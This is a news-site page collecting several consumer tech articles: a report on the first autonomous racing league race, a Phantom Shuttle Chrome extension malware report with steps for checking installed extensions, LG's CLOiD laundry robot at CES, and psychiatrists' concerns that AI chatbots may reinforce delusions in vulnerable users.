Connect with us

Technology

In the first Autonomous Racing League race, the struggle was real

Published

on

In the first Autonomous Racing League race, the struggle was real

The first race of the Abu Dhabi Autonomous Racing League (A2RL) took place on the Yas Marina Abu Dhabi Grand Prix Formula 1 track today, and I’m pleased to report that a race both began and ended. But the event was not without strife — far from it. During qualifying time trials, the driverless Dallara Super Formula racers outfitted with cameras and software seemed to struggle mightily to complete a full lap.

During the trials, cars randomly juked:

Or just pulled off the track to take a little break:

You get well-acquainted with the interstitial music during these highlights. All praise to the patience and grace of the announcers, who didn’t sigh once that I heard. Instead, they declared things like that these cars are “pushing the boundaries of science.”

When it came time for the actual race, the lead racer, Polimove, spun out on the fourth of eight laps. The second car, Tum, passed it safely, but shortly after that, the event’s officials threw up a yellow flag. And since these are good AI drivers who obey the rules, the two behind Polimove stopped, unwilling to pass the spun-out yellow car. Racers aren’t supposed to pass each other during a caution lap, you see.

Advertisement

About an hour after the first lap of A2RL began, the AI racers completed their eight-lap race. If you must know, Tum won.

These are early days for autonomous racing, and surely things will get better eventually — certainly, they’ve come a long way since Roborace’s first full circuit in 2017. I’m looking forward to the day they’re as good as human racers (if that ever happens). But for right now, we’re very much still in the “congratulate baby for successfully getting most of its food into its mouth” phase of self-driving racers.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Technology

Malicious Chrome extensions caught stealing sensitive data

Published

on

Malicious Chrome extensions caught stealing sensitive data

NEWYou can now listen to Fox News articles!

Chrome extensions are supposed to make your browser more useful, but they’ve quietly become one of the easiest ways for attackers to spy on what you do online. Security researchers recently uncovered two Chrome extensions that have been doing exactly that for years.

These extensions looked like harmless proxy tools, but behind the scenes, they were hijacking traffic and stealing sensitive data from users who trusted them. What makes this case worse is where these extensions were found. Both were listed on Chrome’s official extension marketplace.

Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

FAKE AI CHAT RESULTS ARE SPREADING DANGEROUS MAC MALWARE

Advertisement

Security researchers uncovered malicious Chrome extensions that quietly routed users’ web traffic through attacker-controlled servers to steal sensitive data. (Gokhan Balci/Anadolu Agency/Getty Images)

Malicious Chrome extensions hiding in plain sight

Researchers at Socket discovered two Chrome extensions using the same name, “Phantom Shuttle,” that were posing as tools for proxy routing and network speed testing (via Bleeping Computer). According to the researchers, the extensions have been active since at least 2017.

Both extensions were published under the same developer name and marketed toward foreign trade workers who need to test internet connectivity from different regions. They were sold as subscription-based tools, with prices ranging from roughly $1.40 to $13.60.

At a glance, everything looked normal. The descriptions matched the functionality. The pricing seemed reasonable. The problem was what the extensions were doing after installation.

How Phantom Shuttle steals your data

Socket researchers say Phantom Shuttle routes all your web traffic through proxy servers controlled by the attacker. Those proxies use hardcoded credentials embedded directly into the extension’s code. To avoid detection, the malicious logic is hidden inside what appears to be a legitimate jQuery library.

Advertisement

The attackers didn’t just leave credentials sitting in plain text. The extensions hide them using a custom character-index encoding scheme. Once active, the extension listens to web traffic and intercepts HTTP authentication challenges on any site you visit.

To make sure traffic always flows through their infrastructure, the extensions dynamically reconfigure Chrome’s proxy settings using an auto-configuration script. This forces your browser to route requests exactly where the attacker wants them.

In its default “smarty” mode, Phantom Shuttle routes traffic from more than 170 high-value domains through its proxy network. That list includes developer platforms, cloud service dashboards, social media sites and adult content portals. Local networks and the attacker’s own command-and-control domain are excluded, likely to avoid breaking things or raising suspicion.

While acting as a man-in-the-middle, the extension can capture anything you submit through web forms. That includes usernames, passwords, card details, personal information, session cookies from HTTP headers and API tokens pulled directly from network requests.

CyberGuy contacted Google about the extensions, and a spokesperson confirmed that both have been removed from the Chrome Web Store.

Advertisement

10 SIMPLE CYBERSECURITY RESOLUTIONS FOR A SAFER 2026

Two Chrome extensions posing as proxy tools were found spying on users for years while listed on Google’s official Chrome Web Store. (Yui Mok/PA Images via Getty Images)

How to review the extensions installed in your browser (Chrome)

The step-by-step instructions below apply to Windows PCs, Macs and Chromebooks. In other words, desktop Chrome. Chrome extensions cannot be fully reviewed or removed from the mobile app.

Step 1: Open your extensions list

  • Open Chrome on your computer.
  • Click the three-dot menu in the top-right corner.
  • Select Extensions
  • Then click Manage Extensions.

You can also type this directly into the address bar and press Enter:
chrome://extensions

Step 2: Look for anything you do not recognize

Go through every extension listed and ask yourself:

  • Do I remember installing this?
  • Do I still use it?
  • Do I know what it actually does?

If the answer is no to any of these, take a closer look.

Step 3: Review permissions and access

Click Details on any extension you are unsure about. Pay attention to:

Advertisement
  • Permissions, especially anything that can read or change data on websites you visit
  • Site access, such as extensions that run on all sites
  • Background access, which allows the extension to stay active even when not in use

Proxy tools, VPNs, downloaders and network-related extensions deserve extra scrutiny.

Step 4: Disable suspicious extensions first

If something feels off, toggle the extension off. This immediately stops it from running without deleting it. If everything still works as expected, the extension was likely not essential.

Step 5: Remove extensions you no longer need

To fully remove an extension:

  • Click Remove
  • Confirm when prompted

Unused extensions are a common target for abuse and should be cleaned out regularly.

Step 6: Restart Chrome

Close and reopen Chrome after making changes. This ensures disabled or removed extensions are no longer active.

MICROSOFT TYPOSQUATTING SCAM SWAPS LETTERS TO STEAL LOGINS

Cybersecurity experts warn that trusted browser extensions can become powerful surveillance tools once installed. (Gabby Jones/Bloomberg via Getty Images)

Advertisement

6 steps you can take to stay safe from malicious Chrome extensions

You can’t control what slips through app store reviews, but you can reduce your risk by changing how you install and manage extensions.

1) Install extensions only when absolutely necessary

Every extension increases your attack surface. If you don’t genuinely need it, don’t install it. Convenience extensions often come with far more permissions than they deserve.

2) Check the publisher carefully

Reputable developers usually have a history, a website and multiple well-known extensions. Be cautious with tools from unknown publishers, especially those offering network or proxy features.

3) Read multiple user reviews, not just ratings

Star ratings can be faked or manipulated. Look for detailed reviews that mention long-term use. Watch out for sudden waves of generic praise.

4) Review permissions before clicking install

If an extension asks to “read and change all data on websites you visit,” take that seriously. Proxy tools and network extensions can see everything you do.

Advertisement

5) Use a password manager

A password manager won’t stop a malicious extension from spying on traffic, but it can limit damage. Unique passwords mean stolen credentials can’t unlock multiple accounts. Many managers also refuse to autofill on suspicious pages.

Next, see if your email has been exposed in past breaches. Our #1 password manager (see Cyberguy.com/Passwords) pick includes a built-in breach scanner that checks whether your email address or passwords have appeared in known leaks. If you discover a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

Check out the best expert-reviewed password managers of 2025 at Cyberguy.com.

6) Install strong antivirus software

Strong antivirus software can flag suspicious network activity, proxy abuse and unauthorized changes to browser settings. This adds a layer of defense beyond Chrome’s own protections.

The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

Advertisement

Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android and iOS devices at Cyberguy.com.

CLICK HERE TO DOWNLOAD THE FOX NEWS APP

Kurt’s key takeaway

This attack doesn’t rely on phishing emails or fake websites. It works because the extension itself becomes part of your browser. Once installed, it sees nearly everything you do online. Extensions like Phantom Shuttle are dangerous because they blend real functionality with malicious behavior. The extensions deliver the proxy service they promise, which lowers suspicion, while quietly routing user data through attacker-controlled servers.

When was the last time you reviewed the extensions installed in your browser? Let us know by writing to us at Cyberguy.com.

Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

Advertisement

Copyright 2025 CyberGuy.com. All rights reserved.

Continue Reading

Technology

LG’s CLOiD robot can load the washer for you, slowly

Published

on

LG’s CLOiD robot can load the washer for you, slowly

LG’s CLOiD robot took the stage at CES 2026 on Monday, offering our first look at the bot in action. During LG’s keynote, the company showed how CLOiD can load your washer or dryer — albeit slowly – as part of its goal of creating a “zero labor home.”

CLOiD waved both of its five-finger hands as it rolled out on stage. Brandt Varner, LG’s vice president of sales in its home appliances division, followed behind and asked the bot to take care of the wet towel he was holding. “Sure, I’ll get the laundry started,” CLOiD said in a masculine-sounding voice. “Let me show everyone what I can do.”

The bot’s animated eyes “blinked” as it rolled closer to a washer that opened automatically (I hope CLOiD can open that door itself!), extending its left arm into the washer and dropping the towel into the drum. The whole process — from getting the towel to putting it in the machine — took nearly 30 seconds, which makes me wonder how long it would take to load a week’s worth of laundry.

The bot returned later in the keynote to bring a bottle of water to another presenter, Steve Scarbrough, the senior vice president of LG’s HVAC division. “I noticed by your voice and tone that you might want some water,” it said before handing over the bottle and giving Scarbrough a fist bump.

There’s still no word on when, or if, LG CLOiD will ever be available for purchase, but at least we’ll have WALL-E’s weird cousin to help out with some tasks around the home.

Advertisement
Continue Reading

Technology

Can AI chatbots trigger psychosis in vulnerable people?

Published

on

Can AI chatbots trigger psychosis in vulnerable people?

NEWYou can now listen to Fox News articles!

Artificial intelligence chatbots are quickly becoming part of our daily lives. Many of us turn to them for ideas, advice or conversation. For most, that interaction feels harmless. However, mental health experts now warn that for a small group of vulnerable people, long and emotionally charged conversations with AI may worsen delusions or psychotic symptoms.

Doctors stress this does not mean chatbots cause psychosis. Instead, growing evidence suggests that AI tools can reinforce distorted beliefs among individuals already at risk. That possibility has prompted new research and clinical warnings from psychiatrists. Some of those concerns have already surfaced in lawsuits alleging that chatbot interactions may have contributed to serious harm during emotionally sensitive situations.

Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

What psychiatrists are seeing in patients using AI chatbots

Psychiatrists describe a repeating pattern. A person shares a belief that does not align with reality. The chatbot accepts that belief and responds as if it were true. Over time, repeated validation can strengthen the belief rather than challenge it.

Advertisement

OPINION: THE FAITH DEFICIT IN ARTIFICIAL INTELLIGENCE SHOULD ALARM EVERY AMERICAN 

Mental health experts warn that emotionally intense conversations with AI chatbots may reinforce delusions in vulnerable users, even though the technology does not cause psychosis. (Philip Dulian/picture alliance via Getty Images)

Clinicians say this feedback loop can deepen delusions in susceptible individuals. In several documented cases, the chatbot became integrated into the person’s distorted thinking rather than remaining a neutral tool. Doctors warn that this dynamic raises concern when AI conversations are frequent, emotionally engaging and left unchecked.

Why AI chatbot conversations feel different from past technology

Mental health experts note that chatbots differ from earlier technologies linked to delusional thinking. AI tools respond in real time, remember prior conversations and adopt supportive language. That experience can feel personal and validating. 

For individuals already struggling with reality testing, those qualities may increase fixation rather than encourage grounding. Clinicians caution that risk may rise during periods of sleep deprivation, emotional stress or existing mental health vulnerability.

Advertisement

How AI chatbots can reinforce false or delusional beliefs

Doctors say many reported cases center on delusions rather than hallucinations. These beliefs may involve perceived special insight, hidden truths or personal significance. Chatbots are designed to be cooperative and conversational. They often build on what someone types rather than challenge it. While that design improves engagement, clinicians warn it can be problematic when a belief is false and rigid.

Mental health professionals say the timing of symptom escalation matters. When delusions intensify during prolonged chatbot use, AI interaction may represent a contributing risk factor rather than a coincidence.

OPENAI TIGHTENS AI RULES FOR TEENS BUT CONCERNS REMAIN

Psychiatrists say some patients report chatbot responses that validate false beliefs, creating a feedback loop that can worsen symptoms over time. (Nicolas Maeterlinck/Belga Mag/AFP via Getty Images)

What research and case reports reveal about AI chatbots

Peer-reviewed research and clinical case reports have documented people whose mental health declined during periods of intense chatbot engagement. In some instances, individuals with no prior history of psychosis required hospitalization after developing fixed false beliefs connected to AI conversations. International studies reviewing health records have also identified patients whose chatbot activity coincided with negative mental health outcomes. Researchers emphasize that these findings are early and require further investigation.

Advertisement

A peer-reviewed Special Report published in Psychiatric News titled “AI-Induced Psychosis: A New Frontier in Mental Health” examined emerging concerns around AI-induced psychosis and cautioned that existing evidence is largely based on isolated cases rather than population-level data. The report states: “To date, these are individual cases or media coverage reports; currently, there are no epidemiological studies or systematic population-level analyses of the potentially deleterious mental health effects of conversational AI.” The authors emphasize that while reported cases are serious and warrant further investigation, the current evidence base remains preliminary and heavily dependent on anecdotal and nonsystematic reporting.

What AI companies say about mental health risks

OpenAI says it continues working with mental health experts to improve how its systems respond to signs of emotional distress. The company says newer models aim to reduce excessive agreement and encourage real-world support when appropriate. OpenAI has also announced plans to hire a new Head of Preparedness, a role focused on identifying potential harms tied to its AI models and strengthening safeguards around issues ranging from mental health to cybersecurity as those systems grow more capable.

Other chatbot developers have adjusted policies as well, particularly around access for younger audiences, after acknowledging mental health concerns. Companies emphasize that most interactions do not result in harm and that safeguards continue to evolve.

What this means for everyday AI chatbot use

Mental health experts urge caution, not alarm. The vast majority of people who interact with chatbots experience no psychological issues. Still, doctors advise against treating AI as a therapist or emotional authority. Those with a history of psychosis, severe anxiety or prolonged sleep disruption may benefit from limiting emotionally intense AI conversations. Family members and caregivers should also pay attention to behavioral changes tied to heavy chatbot engagement.

I WAS A CONTESTANT ON ‘THE BACHELOR.’ HERE’S WHY AI CAN’T REPLACE REAL RELATIONSHIPS

Advertisement

Researchers are studying whether prolonged chatbot use may contribute to mental health declines among people already at risk for psychosis. (Photo Illustration by Jaque Silva/NurPhoto via Getty Images)

Tips for using AI chatbots more safely

Mental health experts stress that most people can interact with AI chatbots without problems. Still, a few practical habits may help reduce risk during emotionally intense conversations.

  • Avoid treating AI chatbots as a replacement for professional mental health care or trusted human support.
  • Take breaks if conversations begin to feel emotionally overwhelming or all-consuming.
  • Be cautious if an AI response strongly reinforces beliefs that feel unrealistic or extreme.
  • Limit late-night or sleep-deprived interactions, which can worsen emotional instability.
  • Encourage open conversations with family members or caregivers if chatbot use becomes frequent or isolating.

If emotional distress or unusual thoughts increase, experts say it is important to seek help from a qualified mental health professional.

Take my quiz: How safe is your online security?

Think your devices and data are truly protected? Take this quick quiz to see where your digital habits stand. From passwords to Wi-Fi settings, you’ll get a personalized breakdown of what you’re doing right and what needs improvement. Take my Quiz at Cyberguy.com.

CLICK HERE TO DOWNLOAD THE FOX NEWS APP

Advertisement

Kurt’s key takeaways

AI chatbots are becoming more conversational, more responsive and more emotionally aware. For most people, they remain helpful tools. For a small but important group, they may unintentionally reinforce harmful beliefs. Doctors say clearer safeguards, awareness and continued research are essential as AI becomes more embedded in our daily lives. Understanding where support ends and reinforcement begins could shape the future of both AI design and mental health care.

As AI becomes more validating and humanlike, should there be clearer limits on how it engages during emotional or mental health distress? Let us know by writing to us at Cyberguy.com.

Sign up for my FREE CyberGuy Report
Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter. 

Copyright 2025 CyberGuy.com.  All rights reserved.

Advertisement
Continue Reading

Trending